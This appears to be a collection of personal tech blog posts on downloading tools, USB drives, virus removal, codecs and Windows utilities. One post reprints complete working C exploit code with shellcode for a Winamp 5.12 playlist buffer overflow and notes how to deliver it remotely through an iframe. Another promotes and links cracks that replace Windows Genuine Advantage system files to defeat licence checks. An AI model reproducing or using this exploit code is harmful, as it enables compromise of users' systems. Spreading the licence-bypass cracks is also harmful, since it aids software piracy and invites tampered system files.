The most frequent problem that we(Malaysians) always get from using our ISP is slow connection to international sites. For locally hosted websites such as LowYat, there’s no such problem. Well, our Malaysian ISP TM Net has done it again, 2 weeks of really slow internet connection to international sites and they’re still not able to fix it. I find it really hard to even download a driver file from manufacturer’s website.

I am a big fan of Heroes and I wanted to use my RapidShare Premium account to download the latest Heroes episode 3×16. My maximum download speed is 1.5Mbps and I am downloading at only 238 bytes/sec, that is 0.2kilobytes per second!

Imagine this has been going on for 2 weeks. How humiliating… At first I waited patiently, keeping my fingers crossed hoping that this problem will last for a day or two but it just went on until today. Made me so fed up and I had to look for another method to download my favorite latest TV show.

Since this is a connection problem, rapidshare automated downloader tools such as jDownloader and CryptLoad are now totally useless. The solution to continue downloading from RapidShare is to install a transloading script on a web server hosted in Malaysia, and use the script to make your server download the file from RapidShare. Once the server finished downloading the file from RapidShare, I would then download from my server at maximum speed.


I found a free script called RapidLeech PlugMod rev. 36 that is able to do that. It supports downloading from RapidShare.com and 35 other file hosting servers such as 2shared.com, 4shared.com, adrive.com, depositfiles.com, downtown.vc, easy-share.com, filefactory.com, fileflyer.com, filego.net, files.to, filesend.net, gigasize.com, ifolder.ru, imageshack.us, letitbit.net, mediafire.com, megashare.com, megashares.com, megaupload.com, netload.in, rapidshare.de, savefile.com, sendspace.com, share-online.biz, sharebase.to, sharedzilla.com, speedyshare.com, turboupload.com, uploaded.to, uploading.com, uploads.bizhat.com, youtube.com, ziddu.com, zippyshare.com and zshare.net.

To download the latest RapidLeech script, you’d have to register at the forum in order to view the download link. Here’s a scenario on how to install the script on my www.mywebsite.com

Once I finished downloading the script, I extract and upload the contents to rapidleech folder on my web server using FTP client.

I then have to make the “files” folder writable for the script to download and dump the files there. If your websever is a linux server, simply right click on the folder, select CHMOD and check all so that the permissions will be set as 777. In Windows server, you’d have to ask the server administrator to set the file folder as writable.

Now I open up my browser, type www.mywebsite.com/rapidleech and I can start asking my server to download files from RapidShare by inserting the rapidshare link and hit the Transload File button.

When the server shows that it has finished downloading, I can then download the file to my computer by simply clicking on the link. As you can see that I can download the file that was in rapidshare at 150+KBps. For advanced users, you can take a look at the config.php in config folder. You can set restrictions and also use premium accounts if you have one.

This script is brilliant and will be very useful when your ISP has problems with international links or if your ISP has blocked you from file sharing websites. Even downloading from normal direct link works! If you want to make some money, you can even modify the script to provide premium download features to public and probably earn few hundreds of dollars per month via advertisement. Of course you will need a powerful server that allows a lot, if not unlimited bandwidth plus a large web space to store the downloaded files. Only one small problem that is the script must be constantly maintained and updated or else when some of the service gets updated, the script will fail to download or upload.

I’ve always loved the performance of Corsair USB flash drives because they are known to be the fastest in the world. 3 years ago I bought a 4GB Corsair Flash Voyager GT which was the fastest back then and I am very impressed with the read and write speed until today. Well back then 4GB is a lot of space but today it is not even enough to backup a DVD which is 4.37GB. So I checked Corsair’s website and they now have GTR range which claims to be even faster than GT! I searched very hard in Malaysia and no one seems to be selling a 128GB Corsair GTR USB flash drive. Fortunately I’ve got a friend living the United States coming back to Malaysia for summer holidays and he’s willing to help me bring it over.

I went to Amazon.com and they are selling the Corsair 128GB Flash Voyager GTR at the price of $289.99. It’s a little expensive but I think it’s worth the price since I can store nearly 30 DVD discs contents into one small plug and play USB flash drive that I can carry around in my pocket without requiring external power. I’ve done a little benchmark to compare against my other USB flash drives and also an external Maxtor hard drive 7200RPM.


First of all, here is how the Corsair 128GB Flash Voyager GTR looks like. It comes with a durable and water-resistant rubber housing. The size is also much bigger compared to normal USB flash drives but it is still very small when compared to an USB external hard drive.

Now the most important thing is to see how fast can Corsair 128GB Flash Voyager GTR perform when compared to others. I’ve used Nirsoft’s USBDeview to test the read and write speed, and also DiskBench to test the drive’s speed in a real life situation with file copying, file creation, and file reading instead in a benchmarking environment. Higher number is better in the benchmark report below.

As you can see from the USB flash drive benchmark result above, the Corsair GTR read speed is even faster than the Maxtor 7200RPM external hard drive! As for the writing speed, it’s averagely around 27% slower than the external hard drive but it’s the fastest if you sort the list in Nirsoft USB Flash Drive Speed test according to write. The drives that are faster than Corsair GTR in the Nirsoft Drive Speed list such as TOSHIBA MK4018GAS, BUFFALO HD-CXU2, Seagate FreeAgent Go and SAMSUNG HD103UJ HDD are actually external hard drives. If you’re looking for the fastest USB flash drive, go for Corsair GTR and you will definitely love the read and write performance.

The old Corsair GT which I’ve used for 3 years still performs very well without problems. The frequently asked questions regarding Corsair’s flash drive wear leveling mentions that Corsair flash drives are built with memory components that can handle AT LEAST 10,000 write cycles. It will definitely last more than 10 years with their dynamic wear leveling technology.

Web installation is getting very common especially when downloading software from Microsoft. The good thing about using web installation is it only download what is necessary, saving both time and bandwidth to install the software. However, for advanced users who doesn’t want to re-download, they prefer to go for offline redistributable setup. A one time download on a huge setup file and there is no need to download again whenever there is a need to reinstall.

The sames goes to Microsoft Visual Studio 2010 Express. If you want to download Visual C# 2010 Express, you can use the web installer vcs_web.exe file and it will download all necessary files and install it on the computer. The official download page also contains an ISO image (VS2010Express1.iso) file at 695MB in size that enables you to install Visual Studio Express products without requiring Internet access during installation. Out of curiosity, I tested another method on how to offline install Visual Studio Express without downloading the whole image file.


From the looks of it, the method has some really cool tricks which is extracting the web installer, opening the baseline.dat file with a text editor to extract the URL which the web installer downloads the files from, and finally installing it with a custom command line switch.

I’ve installed Microsoft Visual C# 2010 Express using the method above and everything seemed to fine until when I tried running Microsoft Visual C# 2010 Express. All I get is an error window telling me “Cannot create the window“.

There are a lot of tips on how to fix this error such as reverting the machine.config to the default version, reinstalling .NET Framework, reinstalling Visual Studio 2010, recreating msvcm100.dll, but none of it fixes the “Cannot create the window” error.

Finally I tried reinstalling Microsoft Visual C# 2010 Express using the web installer and noticed that it needs to download and install an additional 9 other components which are VC 9.0 Runtime, .NET Framework 4 Multi-Targeting Pack, Microsoft SQL Server Compact 3.5 SP2 and etc…

Visual C# 2010 Express cannot run if any of the required components are not installed. So the best is to either use the web installer if you have a fast internet connection or simply download the all-in-one ISO file and burn it to a CD, mount it as a virtual drive or extract it with 7-Zip.

Download Visual Studio 2010 Express All-In-One ISO
Download Visual Basic, C#, C++ 2010 Express Web Installer

I have my own private RapidLeech server which is hosted in Malaysia and it’s very useful whenever I am downloading a file at a very slow speed. I can make use of the server that has a very fast connection to download the file for me and save it to the server and then I will download it from the server. Since the server is located in the same country as I currently am, I am able to achieve maximum download speed. The only thing I have to worry is I have to make sure that my hosting does not run out of the given bandwidth which is 200GB. Once I exceed the bandwidth limit, all websites will be suspended until it reset in the new month.

I’ve updated to the latest Rapidleech v42 pr-t2 because the v41 wasn’t working very well. After the upgrade, I am seeing an error message at the footer of the rapidleech page which says “getCpuUsage(): couldn’t access STAT path or STAT file invalid“. I have tried installing RapidLeech on another server and there’s no such error message. It is supposed to display a nice information on server space and CPU load.

That error is not a big deal but I don’t want that error message to show. There are 447 files in RapidLeech archive and I am certainly not going to edit one by one with notepad and search for the getCpuUsage keyword. So I use TextCrawler to automatically help me find a keyword across multiple files and folders.


TextCrawler is a free tool for searching and replacing over multiple plain text files. It can search for straight text and supports advanced search/replace via regular expressions.

TextCrawler Features:

Find and Replace across files

Fast searching, even on large files

Simple to use interface

Flexible search parameters

Text Extractor – rip text into a new file

Search and replace using Regular Expressions. Create sophisticated searches

Regular Expression test tool

Regular Expression library – Save your searches

Create backup files

Highlighted search results

Export Results

Batch find and replace operations

To use TextCrawler search for a word, I first select the folder (Start Location) that I want to search in. Then set the Filename/Filter as *.* so it will try to search all files in that selected folder. At Find, I entered the word getCpuUsage and then clicked the Find button. In less than 3 seconds, TextCrawler is able to let me know which text files contains the word “getCpuUsage” and at which line.

In another scenario, during software giveaways, there are more than 1000 entries and copying every single email address to a text file to randomly select a winner is tough. So I hacked the WordPress core file to set it to display 300 comments for an article. Then I saved all the contents to a text file, and use TextCrawler’s Regular Expressions to easily extract all the email addresses.

[ Download TextCrawler ]

I thought Brontok virus from Indonesia was the most powerful, annoying and toughest virus to remove but now I have encountered another virus which is worst than Brontok. The virus will leave a HTML file which you can identify the virus name as JambanMu. In Malaysia, when say Jamban, it means toilet. But I have a Malay friend and he told me that jambanmu means “Your V@gina”. He also added that the word Jamban is used in Malaysia, so this virus might be originated from Malaysia!

Weirdly, antivirus company doesn’t identify the virus as JambanMu. I uploaded the virus file to VirusTotal and all antivirus is able to identify the file as Alman or Almanahe virus. Just like Brontok, some antivirus calls it Rontokbro.

Here are the symptoms of being infected by JambanMu, Alman or Almanahe virus and also how to easily removing this annoying virus.


1. You have a HELP ME!!.html file at your C:\ drive. When you open it, it has the title of W32.JambanMy.V2 which brings MESSEGE FROM HELL!! It insults and complain about KFC, McDONALD, 7 11, oil, water, electricity, azam, zawawi, kamal, dzulkifli, israel, bush and yahudi. At the bottom, it has a line that says “Reported by 666.JambanMu.V2″

2. Registry Editor (regedit) being disabled.

3. Command Prompt (cmd) being disabled.

4. Flash.10.exe and Macromedia.10.exe loaded in Windows Task Manager.

5. Folder Options missing

6. Search at Start Menu missing

7. You’re unable to access a lot of AntiVirus websites such as virustotal.com, symantec.com and etc because your HOSTS file has been modified to redirect antivirus websites to 127.0.0.1.

JambanMu virus spreads via mapped drives and also portable USB flash drive. When I plug in a USB flash drive on a computer that is infected by JambanMu virus, it automatically creates autorun.inf and Flash.10.Setup.exe. If I open the flash drive from My Computer, it’ll run Flash.10.Setup.exe and infects the computer. JambanMu virus reaches the computer in a file that has the icon of a flash file.

I also noticed another thing. When I insert a USB flash drive that is infected by JambanMu virus to a computer, I right click on the drive, there is a menu that says “Scan for Viruses“. I right click on local hard drives, but this menu didn’t appear.

Just as I’ve expected, there is an autorun.inf file at the root of my USB flash drive and gives this command. If I select this command, it’ll launch Scanner.exe which is also JambanMu virus.

At first I tried removing this virus using AIMfix, CaSIR, HijackThis and they all failed. After a little searching, I found a lot of research and testing, you only need to run 2 types of cleaners to easily and automatically remove JambanMu, Alman or Almanahe virus and also restoring the damages made by the virus. Do NOT run ComboFix and SDFix together simultaneously. Run ComboFix first, restart, then run SDFix.

1. ComboFix

Instructions: Do not mouseclick combofix’s window while it is running. That may cause it to stall.
[ Download ComboFix ]

2. SDFix

Instructions: Download and run SDFIX.exe. Click install button to extract SDFix files. Restart your computer in Safe Mode. Once you’re booted into Safe Mode, go to C:\SDFix folder and launch RunThis.bat. Press Y and hit ENTER. It will start scanning your computer and removing JambanMu virus.
[ Download SDFix ]

Once you’ve completed running both ComboFix and SDFix, the JambanMu, Alman or Almanahe virus will be removed and your registry editor, command prompt, folder options and windows search will be restored.

When I was doing my research on this virus, I found other 2 files to clean JambanMu virus. First one is Virus Remover Tool for Win32/Alman from AVG. It is able to “clean” JambanMu virus but it does not restore the damage. You must download the following two files ( rmalman.exe, rmalman.nt ) and run the rmalman.exe file.
[ Download AVG Win32/Alman Removal Tool ]

The second one is called KillFlash1.0 which claims to kill Flash.10.exe. I’ve tried this tool and it is not effective.
[ Download KillFlash1.0 ]

Recently I’ve been getting a lot of pingbacks and most of them comes from .co.cc websites. A pingback is a method for web authors to request notification when somebody links to one of their documents. Typically, web publishing software will automatically inform the relevant parties on behalf of the user, allowing for the possibility of automatically creating links to referring documents. For example, I’ve written an article on my Web log. Bob then reads this article and comments about it, linking back to my original post. Using pingback, Bob’s software can automatically notify me that my post has been linked to, and my software can then include this information on my site.

When I checked on these few websites, they appeared to be copycats, simply and blindly copying EVERYTHING word to word plus linking the images directly from my site stealing my server’s bandwidth. The reason why I got pingback notification is because sometimes I add links to my old article and they forgot to remove it causing them to link to my old post.

Dealing with copycats is easy. Normally I notify them via email IF there is a contact form (well most copycats don’t have one, maybe they don’t want to be contacted so that they can play ignorant) or leave a comment. If they don’t respond to my request, I will fax an abuse complaint letter to their webhost and they normally respond to it by suspending the website. Problem is .co.cc is not a webhost and they are just redirectors. Here is how I find their webhost for websites with .co.cc address.


CO.CC has an online form to report spam or abuse but all they do is just delete/suspend the URL. The copycats can sign up for a new account and redirect their original website to use a new .co.cc url. The best way is to find their webhost and then make sure that the copycat’s website get suspended and lose the articles that they spent hours or days copying.

This two sites (naisoft.co.xx & pcwilleasy.co.xx, replace the xx with cc) has been doing for it a long time and it’s time to let them know it’s wrong. All I needed to use is Robtex’s DNS tool that checks detailed DNS information for a hostname or a domain.

As you can see, naisoft is hosted at summerhost.info and pcwilleasy is hosted at atbhost.net. Try looking for the “Terms of Service” or “Terms of Use” page which contains information for you to contact them. If not, just try to contact the abuse department via support ticket or contact form. There will be times when these companies that provides free hosting ignores your request because they too think you cannot legally do anything to them. Well they are wrong. Normally they don’t own the servers at home and they rent the servers from datacenters. So contact their datacenter and they’ll surely comply with your request or else they’ll risk their servers being terminated. To find the datacenter, just do a whois on the IP address using DNS Tools.

As you can see, redirecting your wordpress, blogspot, 000webhost and etc hosted website to a .co.cc address to hide your original website don’t protect you nor let you get away from copying articles. The two copycats has complied with my request and removed the articles that they copied from here.

NullSoft has released Winamp version 5.13 on 1/30/06 that fixes an “EXTREMELY” critical security vulnerability in (in_mp3).
Everyone is extremely recommended to update to the latest version.


ATmaCA has discovered a vulnerability in Winamp, which can be exploited by malicious people to compromise a user’s system.
The vulnerability is caused due to a boundary error during the handling of filenames including a UNC path with a long computer name. This can be exploited to cause a buffer overflow via a specially crafted playlist containing a filename with an overly long computer name (about 1040 bytes).
Successful exploitation allows execution of arbitrary code on a user’s system when e.g. a malicious website is visited.
The vulnerability has been confirmed in version 5.12. Other versions may also be affected.

[ Download Winamp v5.13 Setup ]
Or you can alternatively download the in_mp3.dll and place it in your Winamp\Plugins folder.

For computer security wizards, you can take a look at the exploit code below.
I do not take any responsibility that can/has been done with the code below as it is widely and publicly available.

/*
*
* Winamp 5.12 Remote Buffer Overflow Universal Exploit (Zero-Day)
* Bug discovered & exploit coded by ATmaCA
* Web: http://www.spyinstructors.com && http://www.atmacasoft.com
* E-Mail: [email protected]
* Credit to Kozan
*
*/

/*
*
* Tested with :
* Winamp 5.12 on Win XP Pro Sp2
*
*/

/*
* Usage:
*
* Execute exploit, it will create “crafted.pls” in current directory.
* Duble click the file, or single click right and then select “open”.
* And Winamp will launch a Calculator (calc.exe)
*
*/

/*
*
* For to use it remotely,
* make a html page containing an iframe linking to the .pls file.
*
* http://www.spyinstructors.com/atmaca/research/winamp_ie_poc.htm
*
*/

#include
#include

#define BUF_LEN 0x045D
#define PLAYLIST_FILE “crafted.pls”

char szPlayListHeader1[] = “\r\nFile1=”;
char szPlayListHeader2[] = “\r\nTitle1=~BOF~\r\nLength1=FFF\r\nNumberOfEntries=1\r\nVersion=2\r\n”;

// Jump to shellcode
char jumpcode[] = “\x61\xD9\x02\x02\x83\xEC\x34\x83\xEC\x70\xFF\xE4″;

// Harmless Calc.exe
char shellcode[] =
“\x54\x50\x53\x50\x29\xc9\x83\xe9\xde\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x02″
“\xdd\x0e\x4d\x83\xee\xfc\xe2\xf4\xfe\x35\x4a\x4d\x02\xdd\x85\x08\x3e\x56\x72\x48″
“\x7a\xdc\xe1\xc6\x4d\xc5\x85\x12\x22\xdc\xe5\x04\x89\xe9\x85\x4c\xec\xec\xce\xd4″
“\xae\x59\xce\x39\x05\x1c\xc4\x40\x03\x1f\xe5\xb9\x39\x89\x2a\x49\x77\x38\x85\x12″
“\x26\xdc\xe5\x2b\x89\xd1\x45\xc6\x5d\xc1\x0f\xa6\x89\xc1\x85\x4c\xe9\x54\x52\x69″
“\x06\x1e\x3f\x8d\x66\x56\x4e\x7d\x87\x1d\x76\x41\x89\x9d\x02\xc6\x72\xc1\xa3\xc6″
“\x6a\xd5\xe5\x44\x89\x5d\xbe\x4d\x02\xdd\x85\x25\x3e\x82\x3f\xbb\x62\x8b\x87\xb5″
“\x81\x1d\x75\x1d\x6a\xa3\xd6\xaf\x71\xb5\x96\xb3\x88\xd3\x59\xb2\xe5\xbe\x6f\x21″
“\x61\xdd\x0e\x4d”;

int main(int argc,char *argv[])
{
printf(“\nWinamp 5.12 Remote Buffer Overflow Universal Exploit”);
printf(“\nBug discovered & exploit coded by ATmaCA”);
printf(“\nWeb: http://www.spyinstructors.com && http://www.atmacasoft.com”);
printf(“\nE-Mail: [email protected]”);
printf(“\nCredit to Kozan”);

FILE *File;
char *pszBuffer;

if ( (File = fopen(PLAYLIST_FILE,”w+b”)) == NULL ) {
printf(“\n [Err:] fopen()”);
exit(1);
}

pszBuffer = (char*)malloc(BUF_LEN);
memset(pszBuffer,0×90,BUF_LEN);
memcpy(pszBuffer,szPlayListHeader1,sizeof(szPlayListHeader1)-1);
memcpy(pszBuffer+0x036C,shellcode,sizeof(shellcode)-1);
memcpy(pszBuffer+0×0412,jumpcode,sizeof(jumpcode)-1);
memcpy(pszBuffer+0×0422,szPlayListHeader2,sizeof(szPlayListHeader2)-1);

fwrite(pszBuffer, BUF_LEN, 1,File);
fclose(File);

printf(“\n\n” PLAYLIST_FILE ” has been created in the current directory.\n”);
return 1;
}

// milw0rm.com [2006-01-29]

I’ve seen many cases that movies downloaded from Internet can’t be played properly… A normal downloaded movie is around 700MB and it takes hours to complete downloading it. It’s surely frustrating that you wasted hours downloading a movie that you eagerly want to watch but then you only get the sound but no video. Or, you get only the video but no sound. You’ll be cursing the person who rip the video and uploaded the video file.

Before doing that and deleting the downloaded movie away, you are very likely to be able to play the movie perfectly together with the audio and video IF you have the correct codec installed. A codec is a device or program capable of performing encoding and decoding on a digital data stream or signal. Different rippers use different codecs to rip the movie off a CD or DVD. So in order to play correctly, you need to install the codec that’s used to rip the disc.

Thankfully there are a few good tools that that supplies technical and tag information about a video or audio file.


I found 3 free tools that is able to tell you what codec is necessary in order to play a video or audio file.

1. MediaInfo

When you load a movie file into MediaInfo, it’ll give you the following information.
General: title, author, director, album, track number, date, duration…
Video: codec, aspect, fps, bitrate…
Audio: codec, sample rate, channels, language, bitrate…
Text: language of subtitle
Chapters: number of chapters, list of chapters

I like this tool as it’s not very complicated by giving you the unnecessary information. Simply load the movie file, it’ll detect what video and audio required to play. There’s a button on the main interface where you can click to go to the official website of the video codec or audio codec. Download the codec, install it and you’re all set to watch the downloaded video.

[ Download MediaInfo ]

2. AVIcodec

AVIcodec is able to tell you the codec required and where to download it. It is able to read AVI & DIVX, ASF & WMV, Real (.rm, .rmvb), Ogg (.ogg, .ogm), Mpeg-(S)VCD-DVD (.mpg, .vob), FLV and all those handled by DirectShow (.mp3, …). Just load the video or audio file, and it will show you the information. Clicking on the small “web” button will bring you to the official website to download the codec.

Current AVIcodec version is quite outdated. There’s a newer version for beta test which is said to be available till end of March 2007, but it’s still available. Looks like AVIcodec is not actively being developed.

[ Download AVIcodec ]

3. afreeCodecVT

Easily determine the Audio and Video codec required to view your video. Once the codec or problem is determined; you may easily search for the codec or tool to solve your issue using the software.

Only reads AVI files. It doesn’t bring you to the official website to download the required codecs. Searching for codec download links in afreeCodec and afreeDLL doesn’t work. The link where it says “View a scenario in which afreeCodecVT is used to solve a issue.” in HELP section doesn’t work. Codec wizard doesn’t work as well. A lot of function in this tool will bring you to afreeCodecVT’s website but I think the website has changed and this tool doesn’t point to the correct page.

[ Download afreeCodecVT ]

4. GSpot

There is no need to install GSpot. Just download, extract and run GSpot.exe. GSpot is able to tell you whether you’ve installed the codec required to play the movie file you examine. If it says “Codec(s) are Installed”, then you can play without problems. If it says “Codec(s) are NOT Installed”, then you have to manually search for the codecs in Google. Would be nice if it has a database of direct link to download the required codecs.

[ Download GSpot ]

From all 4 codec recognition tools above, I prefer to use MediaInfo. It is able to support many types of files and recognize many codecs. MediaInfo is actively being developed and don’t require any installation. It also brings you to the correct website to download the official required codec.

Update: Sorry guys, totally forgotten about GSpot which is the most famous of them all. Just updated this post with GSpot.

Download Movies Download Movies

I found cracks for Windows Genuine Advantage Validation v1.5.554 and v1.5.708. I went to Windows Update and didn’t find any KB905474 updates as I am still using WGA 1.5.540. Team CRUDE cracked Windows Genuine Advantage Validation v1.5.554 on 2nd October 2006 and they claimed that it is the newest Windows Genuine Advantage from Microsoft. A day later on 3rd October 2006, Team ETH0 released a newer version which is v1.5.708 and they claim that this is the same crack that Microsoft shipped with their Windows XP release some days ago.

Anyway, if you’ve installed the either of the WGA versions above, you can get the cracks at the end of this post.


Team CRUDE’s crack for Windows Genuine Advantage Validation v1.5.554.0 contains cracked LegitCheckControl.dll, WgaLogon.dll and WgaTray.exe. You need to replace the files in your Windows System32 directory. If it says that the file is in use, you’ll need to boot into Safe Mode to replace the files.

As for Team ETH0, it comes with LegitCheckControl.DLL, WgaLogon.dll, WgaTray.exe and an additional batch file installer.bat. Just run the installer.bat file and it will auto kill wgatray.exe process and auto replace LegitCheckControl.DLL, WgaLogon.dll and WgaTray.exe file. Much simpler.

Remember, Team CRUDE’s crack is for WGA v1.5.554 and Team ETH0′s crack is for WGA v1.5.708. Don’t be confused with both different versions! I noticed that Team ETH0′s LegitCheckControl.dll doesn’t have Digital Signatures on it when view the file properties.

[Download Team CRUDE Windows Genuine Advantage Validation v1.5.554.0]
[Download Team ETH0 Windows Genuine Advantage Validation v1.5.708.0]

Probably some of you have heard of BootVis, which can be used to check how long a Windows XP machine takes to boot, and then to optimize the boot process, sometimes considerably reducing the time required. BootVis can be considered as a very useful tool but unfortunately it can only work in Windows XP and it is no longer being supported by Microsoft. There is another alternative called Boot Log XP which is a shareware. It is easier to use compared to BootVis and it gives you important information about started drivers, running processes and loaded DLLs. Boot Log XP also only works on XP because it extracts information from binary ETL file (as BootVis) and interprets results using our own method.

The author of Boot Log XP claims that they are working on a new version which will support XP-64 and for Windows Vista/Seven but it’s been a long time they posted that on their website without any updates. So if you’re on Windows Vista or 7, you can use WinBootInfo as Bootvis alternative.


WinBootInfo is the advanced Windows Boot Analyzer that logs drivers and applications loaded during system boot, measures Windows boot times, records CPU and I/O activity during the boot, and much more! With WinBootInfo, you get to know what actually happens during Windows boot and what process is taking up a long time to start that makes Windows bootup time slower.

WinBootInfo Features:

Windows Boot Time Logging

Detailed information about loaded drivers, applications and system DLLs

Each loaded system component is displayed on the detailed time map

Tree-View of Loaded Processes sorted in time, with all belonging DLLs/Drivers

Different times logged (boot to Login Prompt, Explorer, Session Manager)

Detailed CPU utilization tracking during boot, per every CPU core

I/O activity tracking during boot

System Interrupt / Context Switch tracking during boot

Text Log generation and Printing

History Feature, for comparing current with the past boot results

WinBootInfo is very easy to use. The first time you run it, the program will inform you that there is no boot analysis data recorded and ask if you you want WinBootInfo to log your next Windows boot and collect boot information for analysis.

Clicking Yes will schedule WinBootInfo to track what is being loaded at next restart. The screenshot below shows boot performance. The Boot Process Tree which is on the left shows the process being loaded in order by Windows during startup. In the middle it has detailed boot load history for drivers and applications, and at the bottom it also shows the CPU and disk utilization history during boot.

WinBootInfo only tells you what are being loaded and you will need other software such as Autoruns to disable the process from startup. WinBootInfo is probably the ONLY software in the world that is able to do what it does unless BootLogXP is able to come up with a new version… It cost $14.95 to purchase a single license but you can use it for 30 day free trial without limitations. Although the product page did not mention that it supports Windows 7, but I’ve got confirmation from the author of WinBootInfo that it does. In fact I’ve personally tested WinBootInfo on my Windows 7 Ultimate 32bit and it works perfectly.

[ Download WinBootInfo ]

If you didn’t know, Microsoft Windows does not allow you to autorun USB drives when they are inserted. The Windows Autorun capabilities are restricted to CD-ROM drives and fixed disk drives. No, there are no registry hacks to enable USB drives autorun feature because of security issues. Data theft is one security concern for example. The simplicity of reading and writing to basic USB drives and the reasonable amount of data they can hold makes them an ideal target for this.

Usually when you plug in your USB flash drive, you’ll get a notification asking you what would you like to do.

If your end “Explorer.exe” process, and you plug in your USB flash drive, you won’t even get the prompt. Usually computers that are used for giving exams won’t have “explorer.exe” loaded and that can prevent you from copying the exam data out.

Anyway, if you still would like to automatically launch the program of your choice on your USB Flash Drive everytime you plug it in your computer, then please continue reading. There is a way to make Windows autorun USB flash drives.


Since Windows does not allow flash drive to automatically auto execute any programs, we’ll turn to 3rd party software to do that. I found a few and here is what I have to say about it.

1. AutoRun USB

If you visit AutoRun USB official website now, they no longer offering free version of AutoRun USB. Their latest version of AutoRun USB is version 4 and it cost $4.99. But if you don’t mind using their first version of AutoRun USB, then you can use it for FREE. One thing I don’t like about AutoRun USB is it recognizes autorun.usb instead of autorun.inf. Why don’t they make it standard? You need to manually copy the autorun.usb from C:\Program Files\AutoRun USB to the root of your USB flash drive and edit it with notepad.

[ Download AutoRun USB v1.0 ]

2. BusRunner

If you think AutoRun USB is bad, this is even worst! First of all, I can’t find anything about BusRunner on the official website. Looks like they’ve removed it for good! Next, after installing BusRunner, I see an icon appear at your tray bar. When I plug in my USB flash drive, I can right click on the icon to set the default program to run when it’s plugged in. After I did that, I wasn’t able to safely remove my USB flash drive. I get the error message “Problem Ejecting USB Mass Storage Device. The device ‘Generic volume’ cannot be stopped right now. Try stopping the device again later.” No matter how long I wait, I still won’t be able to safely eject my USB flash drive. The only safe way to eject my USB flash drive is to close BusRunner first, then only I am able to safely remove my USB flash drive. Oh, and BusRunner also doesn’t recognize Autorun.inf. It uses BusRunner.cfg file at the root of your USB flash drive.

[ Download BusRunner ]

3. APO USB Autorun

This is the best if compared with the first two software to can make Windows autorun USB flash drives. APO USB Autorun recognizes the standard autorun.inf (as used with CDs) and executes it. If you don’t know how to write autorun.inf file, this software includes an autorun.inf builder. In addition to the autorun functionality, the program also allows you to quickly access the files on the USB drive(s) from the tray icon menu. APO USB Autorun now comes with plugins to backup/restore folder upon drive insertion.

[ Download APO USB Autorun ]

On December last year I found out about Windows Live Messenger 2009 and mistakenly thought it was official final version but it was actually a public beta. Anyway I installed it on my laptop and is using it until today. So far it has been perfect and never got any problems with it. While I was back in my home town for two weeks last month, I wanted to see my wife from her webcam in her laptop but the “Show my webcam” option has been grayed out. I used TeamViewer to remotely control the computer and ran Audio and video setup, the webcam test was fine… Weirdly the “Start a video call” worked as well.

As you all know, the Internet connection in my hometown is really slow and the video call between me and my wife is terribly slow and I could only see her 1 frame in . I didn’t want to use video call because it requires more bandwidth to transfer both audio and video compared to Show My Webcam which only streams the video. I wasn’t able to find a solution at that time but today I’ve found a workaround to enable Show My Webcam on Windows Live Messenger 2009.


Only my new Acer laptop running Windows Vista with Windows Live Messenger 2009 has the show my webcam missing problem but it was fine on my old laptop that’s running Windows XP with Windows Live Messenger 2009. First thing I did was to uninstall WLM 2009 and then do a reinstallation but no go. Then I thought that the problem could be caused by the Acer Crystal Eye Webcam that is installed by default, so I uninstalled it but still couldn’t use show my webcam option. I also read that antivirus could cause such problems. I terminated Kaspersky Antivirus 2009, all connections has been reset and I had to reconnect the Windows Live Messenger 2009. Suddenly the Show my webcam option is AVAILABLE! I then tried to show my webcam and it worked!

OK I hit the jackpot and thought it was Kaspersky but I was wrong. I rebooted the computer, terminated Kaspersky, ran Windows Live Messenger 2009, connected but this time the show my webcam option is again unavailable. I had to uninstall Kaspersky to confirm that it is not the cause of the problem but still the same. So it’s not Kaspersky…

After further testing, I found out that the show my webcam will be available after syncing the Windows Live Messenger 2009 connection. What you need to do is to run Windows Live Messenger 2009 and sign in as usual. Once you’re signed in, click the small button on the top right, select File > Sign Out.

When you’ve successfully signed out, sign in again. Weirdly that will enable the show my webcam option.

There’s no such problem on my old laptop which I manually installed Windows XP and Vista with external webcam. I am not sure what is the cause of this problem but I believe it should have something to do with either some of the pre-installed software/driver by Acer or the build-in webcam on my new laptop. Well Windows Live Messenger 2009 is still in public beta, so it is expected to have some bugs. With this workaround, I don’t need to revert back to the old Messenger 8.5 and can continue using the beautiful Windows Live Messenger 2009 😉

If we want to know whether a file contains virus or not is by downloading the file to our computer first and then let the antivirus that is installed on our computer do the job. Or another method is to also download the suspicious file to our computer and then upload it to Virustotal or independant antivirus website for scanning. I get a little upset yesterday when I wanted to send a link that contains photos taken during my wedding to a friend in an archive (.zip) file. The first thing that she asked was is that a virus? Are you sending something awful to me? Even after I said that it’s my wedding photo, she still didn’t dare to download because her computer friend told her not to simply download stuff from the Internet…

I don’t know what kind of computer friend she had but am sure he/she is a newbie that is just too afraid too download anything over the Internet even from a trusted friend. If one antivirus doesn’t give her any confidence, then maybe over 40 antivirus in VirusTotal scanning that one file should do it. However that requires her to download the file to her computer first. To solve this problem, here’s a way to scan files with 22 antivirus engines without first downloading it to your computer.


NoVirusThanks, a website that offers free service to analyze your file with 22 AntiVirus Engines and will report back the analysis result has now included a new feature to scan web address. Last year I’ve written about NoVirusThanks but back then it didn’t have such feature.

The new “Scan Web Address” option allow users to scan a file before they download it in their own computer. You can scan, for example, the file located in www.site.com/file.exe before download it in your computer. It can also be used to scan a single web page .html/.php/.js with all the Antivirus engines. Sometimes when a direct download link to a file is being hidden, Scan Web Address can also handle the redirection or any changes in the filename. Other than that, the online scanning feature by NoVirusThanks has been recently optimized for stability and with improved binder detector.

Let me walk you through it on how to scan a file without downloading it to your computer using NoVirusThanks.

1. Find the link that you want to scan. Let’s take DPC Latency Checker for an example. Visit the official DPC Latency Checker download page.

2. Right click on the link that lets you download the file and select Copy Link Location.

3. Now go to NoVirusThanks and click Scan Web Address tab.

4. Right click on the box just below the text that says “Web Address to Scan”, select Paste and finally click the Submit Address button.

5. Wait for about a minute and you will have your report on how many antivirus detected the file as infected.

The advantage of this feature allows you to save your time and bandwidth if you are on a limited plan from your ISP. Other than that, people with fear from downloading files over the Internet can now feel safer to download. I believe the maximum file size limit to scan is 20MB. I tried scanning Kaspersky Anti-Virus 2010 v9.0.0.463 installer file (kav9.0.0.463en.exe) but got the error “Could not fetch the requested address: Failed writing body”.

